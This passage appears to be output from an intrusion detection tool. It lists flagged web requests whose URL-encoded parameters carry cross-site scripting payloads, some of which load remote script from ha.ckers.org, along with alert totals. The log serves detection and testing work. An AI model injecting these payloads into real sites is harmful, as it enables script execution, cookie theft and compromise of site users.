8String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-copy=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&]	Nattacks [1]	Signatures	[2009714]
Packet [1581]	Uri [/web/?demo-email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1582]	Uri [/web/?demo-email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-priority=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-human=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-copy=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1583]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1585]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1596]	Uri [/web/?demo-email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-priority=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-human=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-copy=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1599]	Uri [/web/?demo-email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1605]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1606]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1607]	Uri [/web/?demo-email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1608]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1611]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1614]	Uri [/web/?demo-email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-priority=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-human=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-copy=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1620]	Uri [/web/?demo-email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-priority=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-human=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-copy=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1624]	Uri [/web/?demo-email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1629]	Uri [/web/?demo-email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1637]	Uri [/web/?demo-email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-priority=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-human=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-copy=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1639]	Uri [/web/?demo-email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-priority=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-human=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-copy=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1644]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1648]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
# N. packets [1654], [330] with alerts, N. Alerts [330]
# Execution time: 0.625226 s
